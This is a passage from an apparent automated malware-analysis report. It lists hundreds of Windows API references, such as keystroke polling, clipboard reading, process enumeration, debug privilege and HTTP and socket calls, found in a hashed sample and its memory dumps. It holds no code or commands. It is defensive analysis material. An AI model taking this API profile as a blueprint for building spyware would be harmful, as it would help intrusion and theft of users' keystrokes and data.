\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetVersionExA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetEnvironmentStringsW\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"RtlUnwind\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetACP\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetLocalTime\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"CreatePipe\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetEnvironmentStrings\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetCurrentDirectoryA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"PeekNamedPipe\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetFileSize\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"OpenProcess\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"SetFilePointer\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"DeleteFileA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetCPInfo\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"TerminateProcess\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsW\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetCommandLineA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"TerminateThread\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetProcessHeap\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GlobalUnlock\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetTimeZoneInformation\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"CreateMutexA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"CompareStringW\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetTempPathA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"CreateThread\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetStringTypeA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"FindFirstFileA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"OpenMutexA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"CloseHandle\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"SetStdHandle\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetComputerNameA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"FindNextFileA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"RemoveDirectoryA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"ExitThread\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GlobalLock\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetStringTypeW\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"SetEnvironmentVariableA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"HeapAlloc\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GlobalMemoryStatus\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"CreateProcessA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetLogicalDriveStringsA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetEnvironmentVariableA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"HeapCreate\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"WriteFile\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GlobalAlloc\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"VirtualFree\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"FindClose\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"HeapDestroy\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"Sleep\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetFileType\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"SetEndOfFile\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"CreateFileA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetTickCount\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetVersion\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"VirtualAlloc\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"CompareStringA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"ShellExecuteA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetAsyncKeyState\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetForegroundWindow\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"PostMessageA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"EnumWindows\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"EnumChildWindows\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"IsWindowVisible\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetWindowTextA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"MessageBoxA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetClassNameA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"CloseClipboard\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"ShowWindow\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"ExitWindowsEx\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetClipboardData\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"OpenClipboard\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"HttpSendRequestA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"InternetOpenUrlA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"HttpOpenRequestA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"InternetReadFile\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"InternetOpenA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"InternetConnectA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"InternetCrackUrlA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"WSASocketA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"htonl\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"WSAStartup\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"getsockname\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"htons\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"gethostname\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"closesocket\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"ntohl\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"inet_addr\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"ntohs\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"gethostbyaddr\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"__WSAFDIsSet\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"WSACleanup\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"gethostbyname\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"inet_ntoa\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"WSAAsyncSelect\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"WSAIoctl\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetLastActivePopup\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetActiveWindow\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"WinHelp\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"InternetGetConnectedStateEx\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"InternetGetConnectedState\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"Process32Next\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"Process32First\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"SeDebugPrivilege\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"VirtualProtect\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetLastActivePopup\"; Source: \"00000000-00005224.00000000.139255.0041A000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetActiveWindow\"; Source: \"00000000-00005224.00000000.139255.0041A000.00000040.mdmp\")\n Found reference to API (Indicator: \"MessageBoxA\"; Source: \"00000000-00005224.00000000.139255.0041A000.00000040.mdmp, 00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"WinHelp\"; Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetGetConnectedStateEx\"; Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetGetConnectedState\"; Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found reference to API (Indicator: \"Process32Next\"; Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found reference to API (Indicator: \"Process32First\"; Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateFileA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetLocalTime\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateThread\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GlobalUnlock\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GlobalLock\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFileTime\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetFileTime\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GlobalMemoryStatus\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindClose\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindNextFileA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindFirstFileA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ReadFile\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetFileSize\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenProcess\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapFree\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapAlloc\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetProcessHeap\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ExitThread\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"WriteFile\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreatePipe\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GlobalAlloc\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetComputerNameA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetEnvironmentVariableA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CompareStringW\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CompareStringA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetEndOfFile\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetOEMCP\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetACP\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCPInfo\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeW\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetStdHandle\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFilePointer\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetFileType\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStdHandle\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetHandleCount\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"DeleteFileA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCurrentDirectoryA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetLogicalDriveStringsA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"TerminateThread\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetVersionExA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetTempPathA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenMutexA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateProcessA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateMutexA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CopyFileA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"PeekNamedPipe\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentStringsW\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsW\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapReAlloc\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"VirtualAlloc\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"VirtualFree\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapCreate\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapDestroy\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentVariableA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"LCMapStringW\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"LCMapStringA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetVersion\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RtlUnwind\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetSystemTime\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetTimeZoneInformation\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RemoveDirectoryA\"; Source: 